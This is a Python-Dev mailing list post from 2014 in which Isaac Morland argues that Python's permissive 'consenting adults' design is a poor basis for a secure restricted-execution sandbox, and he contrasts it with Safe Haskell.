[Python-Dev] Reviving restricted mode?
ijmorlan at uwaterloo.ca
Wed Aug 13 19:11:23 CEST 2014
On Thu, 14 Aug 2014, Steven D'Aprano wrote:
> On Thu, Aug 14, 2014 at 02:26:29AM +1000, Chris Angelico wrote:
>> On Wed, Aug 13, 2014 at 11:11 PM, Isaac Morland <ijmorlan at uwaterloo.ca> wrote:
>>> While I would not claim a Python sandbox is utterly impossible, I'm
>>> suspicious that the whole "consenting adults" approach in Python is
>>> incompatible with a sandbox. The whole idea of a sandbox is to absolutely
>>> prevent people from doing things even if they really want to and know what
>>> they are doing.
> The point of a sandbox is that I, the consenting adult writing the
> application in the first place, may want to allow *untrusted others* to
> call Python code without giving them control of the entire application.
> The consenting adults rule applies to me, the application writer, not
> them, the end-users, even if they happen to be writing Python code. If
> they want unrestricted access to the Python interpreter, they can run
> their code on their own machine, not mine.
Yes, absolutely, and I didn't mean to contradict what you are saying.
What I am suggesting is that the basic design of Python isn't a good
starting point for imposing mandatory restrictions on what code can do.
By contrast, take something like Safe Haskell. I'm not absolutely certain
that it really is safe as promised, but it's starting from a very
different language in which the compiler performs extremely sophisticated
type checking and simply won't compile programs that don't work within the
This isn't a knock on Python (which I love using, by the way), just being
realistic about what the existing language is likely to be able to
support. Having said that, I'll be very interested if somebody does come
up with a restricted mode Python that is widely accepted as being secure -
that would be a real achievement.
Isaac Morland CSCF Web Guru
DC 2554C, x36650 WWW Software Specialist
More information about the Python-Dev